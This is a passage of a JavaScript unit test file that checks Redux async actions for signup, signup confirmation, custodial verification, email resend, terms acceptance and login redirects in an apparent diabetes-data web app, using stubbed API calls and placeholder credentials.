Error(ErrorMessages.ERR_ACCOUNT_ALREADY_EXISTS); err.status = 409; let expectedActions = [ { type: 
'SIGNUP_REQUEST' }, { type: 'SIGNUP_FAILURE', error: err, meta: { apiError: {status: 409, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.signup(api, {foo: 'bar'})); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_ACCOUNT_ALREADY_EXISTS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.signup.callCount).to.equal(1); }); it('[500] should trigger SIGNUP_FAILURE and it should call signup once and get zero times for a failed signup request', () => { let user = { id: 27 }; let api = { user: { signup: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null) } }; let err = new Error(ErrorMessages.ERR_SIGNUP); err.status = 500; let expectedActions = [ { type: 'SIGNUP_REQUEST' }, { type: 'SIGNUP_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.signup(api, {foo: 'bar'})); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_SIGNUP }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.signup.callCount).to.equal(1); }); }); describe('confirmSignup', () => { it('should trigger CONFIRM_SIGNUP_SUCCESS and it should call confirmSignup once for a successful request', () => { let user = { id: 27 }; let api = { user: { confirmSignUp: sinon.stub().callsArgWith(1, null) } }; let expectedActions = [ { type: 'CONFIRM_SIGNUP_REQUEST' }, { type: 'CONFIRM_SIGNUP_SUCCESS' } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.confirmSignup(api, 'fakeSignupKey')); const actions = 
store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.confirmSignUp.calledWith('fakeSignupKey')).to.be.true; expect(api.user.confirmSignUp.callCount).to.equal(1); }); it('should trigger CONFIRM_SIGNUP_FAILURE and it should call confirmSignup once for a failed request', () => { let user = { id: 27 }; let api = { user: { confirmSignUp: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_CONFIRMING_SIGNUP); err.status = 500; let expectedActions = [ { type: 'CONFIRM_SIGNUP_REQUEST' }, { type: 'CONFIRM_SIGNUP_FAILURE', error: err, payload: { signupKey: 'fakeSignupKey' }, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.confirmSignup(api, 'fakeSignupKey')); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CONFIRMING_SIGNUP }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.confirmSignUp.calledWith('fakeSignupKey')).to.be.true; expect(api.user.confirmSignUp.callCount).to.equal(1); }); it('[409] should trigger CONFIRM_SIGNUP_FAILURE and it should call confirmSignup once for a failed request and redirect for password creation', () => { let user = { id: 27 }; let api = { user: { confirmSignUp: sinon.stub().callsArgWith(1, {status: 409, message: 'User does not have a password'}) } }; let err = new Error(ErrorMessages.ERR_CONFIRMING_SIGNUP); err.status = 409; let expectedActions = [ { type: 'CONFIRM_SIGNUP_REQUEST' }, { type: 'CONFIRM_SIGNUP_FAILURE', error: err, payload: { signupKey: 'fakeSignupKey' }, meta: { apiError: {status: 409, message: 'User does not have a password'} } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/verification-with-password?signupKey=fakeSignupKey&signupEmail=<EMAIL>' ], method: 'push' } } ]; 
_.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.confirmSignup(api, 'fakeSignupKey', '<EMAIL>')); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CONFIRMING_SIGNUP }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.confirmSignUp.calledWith('fakeSignupKey')).to.be.true; expect(api.user.confirmSignUp.callCount).to.equal(1); }); }); describe('verifyCustodial', () => { it('should trigger ACKNOWLEDGE_NOTIFICATION for the confirmingSignup notification if set', () => { let user = { id: 27 }; let key = 'fakeSignupKey'; let email = '<EMAIL>'; let birthday = '07/18/1988'; let password = '<PASSWORD>'; let creds = { username: email, password: password }; let api = { user: { custodialConfirmSignUp: sinon.stub().callsArgWith(3, null), login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user) } }; let expectedAction = { type: 'ACKNOWLEDGE_NOTIFICATION', payload: { acknowledgedNotification: 'confirmingSignup' } }; let initialStateForTest = _.merge({}, initialState, { blip: { working: { confirmingSignup: { notification: 'hi' } } } }); let store = mockStore(initialStateForTest); store.dispatch(async.verifyCustodial(api, key, email, birthday, password)); const actions = store.getActions(); expect(actions[0]).to.eql(expectedAction); }); it('should trigger VERIFY_CUSTODIAL_SUCCESS and it should call verifyCustodial once for a successful request', () => { let user = { id: 27, emailVerified: true }; let key = 'fakeSignupKey'; let email = '<EMAIL>'; let birthday = '07/18/1988'; let password = '<PASSWORD>'; let creds = { username: email, password: password }; let api = { user: { custodialConfirmSignUp: sinon.stub().callsArgWith(3, null), login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user) } }; let expectedActions = [ { 
type: 'VERIFY_CUSTODIAL_REQUEST' }, { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'LOGIN_SUCCESS', payload: { user: user } }, { type: 'VERIFY_CUSTODIAL_SUCCESS' }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/patients?justLoggedIn=true' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { working: { confirmingSignup: { notification: null } } } }); let store = mockStore(initialStateForTest); store.dispatch(async.verifyCustodial(api, key, email, birthday, password)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.custodialConfirmSignUp.calledWith(key, birthday, password)).to.be.true; expect(api.user.custodialConfirmSignUp.callCount).to.equal(1); expect(trackMetric.calledWith('VCA Home Verification - Verified')).to.be.true; expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger VERIFY_CUSTODIAL_FAILURE and it should call verifyCustodial once for a failed request', () => { let user = { id: 27 }; let key = 'fakeSignupKey'; let email = '<EMAIL>'; let birthday = '07/18/1988'; let password = '<PASSWORD>'; let api = { user: { custodialConfirmSignUp: sinon.stub().callsArgWith(3, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_CONFIRMING_SIGNUP); err.status = 500; let expectedActions = [ { type: 'VERIFY_CUSTODIAL_REQUEST' }, { type: 'VERIFY_CUSTODIAL_FAILURE', error: err, payload: { signupKey: 'fakeSignupKey' }, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { working: { confirmingSignup: { notification: null } } } }); let store = mockStore(initialStateForTest); store.dispatch(async.verifyCustodial(api, key, email, birthday, password)); 
const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CONFIRMING_SIGNUP }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.custodialConfirmSignUp.calledWith(key, birthday, password)).to.be.true; expect(api.user.custodialConfirmSignUp.callCount).to.equal(1); }); }); describe('resendEmailVerification', () => { it('should trigger RESEND_EMAIL_VERIFICATION_SUCCESS and it should call resendEmailVerification once for a successful request', () => { const email = '<EMAIL>'; let api = { user: { resendEmailVerification: sinon.stub().callsArgWith(1, null) } }; let expectedActions = [ { type: 'RESEND_EMAIL_VERIFICATION_REQUEST' }, { type: 'RESEND_EMAIL_VERIFICATION_SUCCESS', payload: {notification: {type: 'alert', message: 'We just sent you an e-mail.'}} } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.resendEmailVerification(api, email)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.resendEmailVerification.calledWith(email)).to.be.true; expect(api.user.resendEmailVerification.callCount).to.equal(1); }); it('should trigger RESEND_EMAIL_VERIFICATION_FAILURE and it should call resendEmailVerification once for a failed request', () => { const email = '<EMAIL>'; let api = { user: { resendEmailVerification: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_RESENDING_EMAIL_VERIFICATION); err.status = 500; let expectedActions = [ { type: 'RESEND_EMAIL_VERIFICATION_REQUEST' }, { type: 'RESEND_EMAIL_VERIFICATION_FAILURE', error: err, meta: {apiError: {status: 500, body: 'Error!'}} } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.resendEmailVerification(api, email)); const actions = 
store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_RESENDING_EMAIL_VERIFICATION }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.resendEmailVerification.calledWith(email)).to.be.true; expect(api.user.resendEmailVerification.callCount).to.equal(1); }); }); describe('acceptTerms', () => { it('should trigger ACCEPT_TERMS_SUCCESS and it should call acceptTerms once for a successful request', () => { let acceptedDate = new Date(); let loggedInUserId = 500; let termsData = { termsAccepted: new Date() }; let api = { user: { acceptTerms: sinon.stub().callsArgWith(1, null) } }; let expectedActions = [ { type: 'ACCEPT_TERMS_REQUEST' }, { type: 'ACCEPT_TERMS_SUCCESS', payload: { userId: loggedInUserId, acceptedDate: acceptedDate } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/patients?justLoggedIn=true' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId: loggedInUserId } }); let store = mockStore(initialStateForTest); store.dispatch(async.acceptTerms(api, acceptedDate)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.acceptTerms.calledWith(termsData)).to.be.true; expect(api.user.acceptTerms.callCount).to.equal(1); }); it('should trigger ACCEPT_TERMS_SUCCESS and it should call acceptTerms once for a successful request, routing to clinic info for clinician', () => { let acceptedDate = new Date(); let loggedInUserId = 500; let termsData = { termsAccepted: new Date() }; let user = { roles: ['clinic'] }; let api = { user: { acceptTerms: sinon.stub().callsArgWith(1, null, user) } }; let expectedActions = [ { type: 'ACCEPT_TERMS_REQUEST' }, { type: 'ACCEPT_TERMS_SUCCESS', payload: { userId: loggedInUserId, acceptedDate: acceptedDate } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ 
'/clinician-details' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId: loggedInUserId } }); let store = mockStore(initialStateForTest); store.dispatch(async.acceptTerms(api, acceptedDate)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.acceptTerms.calledWith(termsData)).to.be.true; expect(api.user.acceptTerms.callCount).to.equal(1); }); it('should trigger ACCEPT_TERMS_SUCCESS and should not trigger a route transition if the user is not logged in', () => { let acceptedDate = new Date(); let loggedInUserId = false; let termsData = { termsAccepted: new Date() }; let user = { id: 27, roles: ['clinic'], }; let api = { user: { acceptTerms: sinon.stub().callsArgWith(1, null, user) } }; let expectedActions = [ { type: 'ACCEPT_TERMS_REQUEST' }, { type: 'ACCEPT_TERMS_SUCCESS', payload: { userId: user.id, acceptedDate: acceptedDate } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId: loggedInUserId } }); let store = mockStore(initialStateForTest); store.dispatch(async.acceptTerms(api, acceptedDate, user.id)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.acceptTerms.calledWith(termsData)).to.be.true; expect(api.user.acceptTerms.callCount).to.equal(1); expect(_.find(actions, { type: '@@router/CALL_HISTORY_METHOD' })).to.be.undefined; }); it('should trigger ACCEPT_TERMS_FAILURE and it should call acceptTerms once for a failed request', () => { let acceptedDate = new Date(); let termsData = { termsAccepted: acceptedDate }; let loggedInUserId = 500; let api = { user: { acceptTerms: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_ACCEPTING_TERMS); err.status = 500; let expectedActions = [ { type: 
'ACCEPT_TERMS_REQUEST' }, { type: 'ACCEPT_TERMS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId: loggedInUserId } }); let store = mockStore(initialStateForTest); store.dispatch(async.acceptTerms(api, acceptedDate)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_ACCEPTING_TERMS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.acceptTerms.calledWith(termsData)).to.be.true; expect(api.user.acceptTerms.callCount).to.equal(1); }); }); describe('login', () => { it('should trigger LOGIN_SUCCESS and it should call login and user.get once for a successful request', () => { let creds = { username: 'bruce', password: '<PASSWORD>' }; let user = { id: 27, emailVerified: true }; let api = { user: { login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user), logout: sinon.stub(), }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; let expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'LOGIN_SUCCESS', payload: { user: user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/patients?justLoggedIn=true' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger LOGIN_SUCCESS and it 
should call login, user.get and patient.get once for a successful request', () => { let creds = { username: 'bruce', password: '<PASSWORD>' }; let user = { id: 27, profile: { patient: true }, emailVerified: true }; let patient = { foo: 'bar' }; let api = { user: { login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user), logout: sinon.stub(), }, patient: { get: sinon.stub().callsArgWith(1, null, patient), }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; let expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_SUCCESS', payload: { patient: patient } }, { type: 'LOGIN_SUCCESS', payload: { user: _.merge({}, user, patient) } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/patients?justLoggedIn=true' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(api.patient.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with no clinic profile to the clinician details form', () => { const creds = { username: 'bruce', password: '<PASSWORD>' }; const user = { id: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true }; const patient = { foo: 'bar' }; const api = { user: { login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user), logout: sinon.stub(), }, patient: { get: sinon.stub().callsArgWith(1, null, patient), }, clinics: { getClinicianInvites: 
sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: [ '/clinician-details' ] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with a clinic profile to the patients view', () => { const creds = { username: 'bruce', password: '<PASSWORD>' }; const user = { id: 27, roles: ['clinic'], profile: { clinic: true }, emailVerified: true }; const patient = { foo: 'bar' }; const api = { user: { login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user), logout: sinon.stub(), }, patient: { get: sinon.stub().callsArgWith(1, null, patient), }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: ['/patients?justLoggedIn=true'] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); 
expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); context('clinic interface is enabled', () => { let api; let creds; let clinics; let invites; let user; let patient; let patients; let setAPIData; before(() => { async.__Rewire__('config', { CLINICS_ENABLED: true, }); }); beforeEach(() => { creds = { username: 'bruce', password: '<PASSWORD>' }; setAPIData = returnData => { const invitesError = _.get(returnData, 'invitesError', null); const clinicsError = _.get(returnData, 'clinicsError', null); const patientsError = _.get(returnData, 'patientsError', null); clinics = _.get(returnData, 'clinics', clinics); invites = _.get(returnData, 'invites', invites); user = _.get(returnData, 'user', user); patient = _.get(returnData, 'patient', patient); patients = _.get(returnData, 'patients', patients); api = { user: { login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user), getAssociatedAccounts: sinon.stub().callsArgWith(0, patientsError, { patients }), logout: sinon.stub(), }, patient: { get: sinon.stub().callsArgWith(1, null, patient) }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, invitesError, invites), getClinicsForClinician: sinon.stub().callsArgWith(2, clinicsError, clinics), }, }; }; }); after(() => { async.__ResetDependency__('config'); }); context('clinician has no clinic invites or associated clinics', () => { beforeEach(() => { setAPIData({ clinics: [], invites: [], patient: { foo: 'bar' }, patients: [], }); }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with no clinic profile to the clinician details form', () => { setAPIData({ user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true }, }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 
'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: [ '/clinician-details' ] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with a clinic profile to the patients view', () => { setAPIData({ user: { userid: 27, roles: ['clinic'], profile: { clinic: true }, emailVerified: true } }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: ['/patients?justLoggedIn=true'] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); 
expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); }); context('clinician has clinic invites', () => { beforeEach(() => { setAPIData({ clinics: [], invites: [ { inviteId: 'invite123' }, ], patient: { foo: 'bar' }, patients: [], }); }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with no clinic profile to the clinic details form', () => { setAPIData({ user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true }, }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [{ inviteId: 'invite123' }] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: [ '/clinic-details' ] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with a clinic profile to the workspaces view', () => { setAPIData({ user: { userid: 27, roles: ['clinic'], profile: { clinic: true }, emailVerified: true } }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { 
type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [{ inviteId: 'invite123' }] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: ['/workspaces'] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); }); context('clinician has associated clinics', () => { beforeEach(() => { setAPIData({ invites: [], patient: { foo: 'bar' }, patients: [], }); }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with relationship containing an empty clinic object to the clinic details form', () => { setAPIData({ user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true }, clinics: [ { clinic: { id: 'clinicId123' } }, ], }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [{ clinic: { id: 'clinicId123' } }] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 
'SELECT_CLINIC', payload: { clinicId: 'clinicId123' } },
      { type: 'LOGIN_SUCCESS', payload: { user } },
      { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: [ '/clinic-details' ] } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    const store = mockStore(initialState);
    store.dispatch(async.login(api, creds));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.user.login.calledWith(creds)).to.be.true;
    expect(api.user.get.callCount).to.equal(1);
    expect(trackMetric.calledWith('Logged In')).to.be.true;
  });

  it('should trigger LOGIN_SUCCESS and it should redirect a clinician with relationship containing a ready-to-migrate clinic object to the clinic details form', () => {
    setAPIData({
      user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true },
      clinics: [
        { clinic: { id: 'clinicId123', name: 'Clinic One', canMigrate: true } },
      ],
    });
    // A single clinic flagged canMigrate is auto-selected before the redirect.
    const expectedActions = [
      { type: 'LOGIN_REQUEST' },
      { type: 'FETCH_USER_REQUEST' },
      { type: 'FETCH_USER_SUCCESS', payload: { user: user } },
      { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' },
      { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [{ clinic: { id: 'clinicId123', name: 'Clinic One', canMigrate: true } }] }},
      { type: 'FETCH_CLINICIAN_INVITES_REQUEST' },
      { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }},
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' },
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }},
      { type: 'SELECT_CLINIC', payload: { clinicId: 'clinicId123' } },
      { type: 'LOGIN_SUCCESS', payload: { user } },
      { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: [ '/clinic-details' ] } }
    ];
    _.each(expectedActions, (action) => {
      expect(isTSA(action)).to.be.true;
    });
    const store = mockStore(initialState);
    store.dispatch(async.login(api, creds));
    const actions = store.getActions();
    expect(actions).to.eql(expectedActions);
    expect(api.user.login.calledWith(creds)).to.be.true;
    expect(api.user.get.callCount).to.equal(1);
    expect(trackMetric.calledWith('Logged In')).to.be.true;
  });

  it('should trigger LOGIN_SUCCESS and it should redirect a clinician with multiple relationships containing a non-empty clinic object to the workspaces view', () => {
    setAPIData({
      user: { userid: 27, roles: ['clinic'], profile: { clinic: true }, emailVerified: true },
      clinics: [
        { clinic: { id: 'clinic123', name: 'Clinic One' } },
        { clinic: { id: 'clinic456', name: 'Clinic Two' } },
      ],
    });
    const expectedActions = [
      { type: 'LOGIN_REQUEST' },
      { type: 'FETCH_USER_REQUEST' },
      { type: 'FETCH_USER_SUCCESS', payload: { user: user } },
      { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' },
      { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [
        { clinic: { id: 'clinic123', name: 'Clinic One' } },
        { clinic: { id: 'clinic456', name: 'Clinic Two' } },
      ] }},
      { type: 'FETCH_CLINICIAN_INVITES_REQUEST' },
      { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }},
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' },
      { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }},
      { type: 'LOGIN_SUCCESS', payload: { user } },
      { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: ['/workspaces'] } }
    ];
    _.each(expectedActions, (action) => {
